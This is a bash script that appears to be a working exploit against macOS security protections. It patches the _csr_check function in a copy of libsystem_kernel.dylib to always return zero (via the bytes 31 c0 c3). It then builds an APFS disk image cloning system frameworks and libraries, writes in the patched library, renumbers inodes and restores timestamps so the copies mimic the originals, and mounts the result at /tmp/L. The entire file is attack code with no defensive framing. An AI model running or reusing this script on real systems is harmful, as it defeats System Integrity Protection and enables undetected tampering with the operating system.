#!/bin/bash
set -e
IFS=$'\n'

COPY_DIRS="$(echo 'System/Library/Frameworks System/Library/PrivateFrameworks System/Library/Receipts usr/lib' | tr ' ' '\n')"
TARGET_LIBRARY_PATH=/usr/lib/system
TARGET_LIBRARY_FILE=libsystem_kernel.dylib

echo "[$(date +%H:%M:%S)] fixing up library..."
cp "$TARGET_LIBRARY_PATH/$TARGET_LIBRARY_FILE" "$TARGET_LIBRARY_FILE"
macho_offset="$(objdump -macho -universal-headers $TARGET_LIBRARY_FILE |
  grep -A100 '^architecture x86_64' |
  grep '^    offset' |
  head -n1 |
  egrep -o '[0-9]+')"
symbol_addr="0x$(nm $TARGET_LIBRARY_FILE | grep -w _csr_check | egrep -o '^[0-9a-f]+')"
symbol_offset=$(($macho_offset + $symbol_addr))
# 31 c0    xor eax, eax
# c3       ret
echo -ne '\x31\xc0\xc3' | dd seek=$symbol_offset bs=1 of=$TARGET_LIBRARY_FILE conv=notrunc

# /System/Library/*Frameworks is *huge* :/
echo "[$(date +%H:%M:%S)] creating empty image..."
rm -f tmp_image.img
dd if=/dev/zero of=tmp_image.img bs=1024 seek=8191999 count=1
#dd if=/dev/zero of=tmp_image.img bs=1024 count=8192000
echo "[$(date +%H:%M:%S)] creating empty filesystem..."
newfs_apfs tmp_image.img

# first prevent fseventfsd from getting in the way by creating inodes we don't expect.
# make sure this takes effect by re-mounting the device.
echo "[$(date +%H:%M:%S)] inhibiting fseventsd..."
mkdir -p mnt
MAIN_DEVICE="$(hdiutil attach tmp_image.img -mountpoint mnt -nobrowse | head -n1 | egrep -o '/dev/disk\S*')"
mkdir mnt/.fseventsd
touch mnt/.fseventsd/no_log
hdiutil detach "$MAIN_DEVICE"

MAIN_DEVICE="$(hdiutil attach tmp_image.img -mountpoint mnt -nobrowse | head -n1 | egrep -o '/dev/disk\S*')"

# create directories and symlinks first, so that they go to the left side of the btree
echo "[$(date +%H:%M:%S)] copying directory hierarchy..."
for dir in $COPY_DIRS; do
  mkdir -p mnt/$dir
done
cc -O2 -o mkdir_batch mkdir_batch.c
(cd /; find $COPY_DIRS -type d | sed 's|^|mnt/|') | ./mkdir_batch
echo "[$(date +%H:%M:%S)] copying symlinks..."
cc -O2 -o symlink_batch symlink_batch.c
(cd /; find $COPY_DIRS -type l) | ./symlink_batch / mnt/
mkdir -p mnt/private/var/db
ln -s /private/var/db/dyld mnt/private/var/db/dyld

echo "[$(date +%H:%M:%S)] collecting inode-sorted file list..."
cc -O2 -o mass_stat mass_stat.c
inode_sorted_files_withnums="$((cd /; find $COPY_DIRS -type f) | ./mass_stat / | sort -n)"
inode_sorted_files="$(echo "$inode_sorted_files_withnums" | cut -d'|' -f2)"

# copy the files, sorted by inode number
echo "[$(date +%H:%M:%S)] copying files..."
cc -O2 -o copy_batch copy_batch.c
echo "$inode_sorted_files" | ./copy_batch / mnt/

echo "[$(date +%H:%M:%S)] overwriting $TARGET_LIBRARY_FILE"
cat $TARGET_LIBRARY_FILE > mnt/$TARGET_LIBRARY_PATH/$TARGET_LIBRARY_FILE
cc -O2 -o mass_stat_2 mass_stat_2.c
echo "[$(date +%H:%M:%S)] collecting inode number pairs..."
inode_remap="$(echo "$inode_sorted_files" | ./mass_stat_2 mnt/ / )"

echo "[$(date +%H:%M:%S)] fixing utime..."
cc -O2 -o utime_fixup utime_fixup.c
./utime_fixup "/$TARGET_LIBRARY_PATH/$TARGET_LIBRARY_FILE" "mnt/$TARGET_LIBRARY_PATH/$TARGET_LIBRARY_FILE"

hdiutil detach "$MAIN_DEVICE"

echo "[$(date +%H:%M:%S)] renumbering inodes..."
cc -O2 -o apfs_mod apfs_mod.c
echo "$inode_remap" > /tmp/inode_remap
echo "$inode_remap" | ./apfs_mod tmp_image.img | tee /tmp/apfs_mod_log
# fix up apfs_next_obj_id
/sbin/fsck_apfs -y tmp_image.img

mkdir -p /tmp/L
echo "[$(date +%H:%M:%S)] final attach..."
hdiutil attach tmp_image.img -mountpoint /tmp/L -nobrowse
echo "[$(date +%H:%M:%S)] READY"
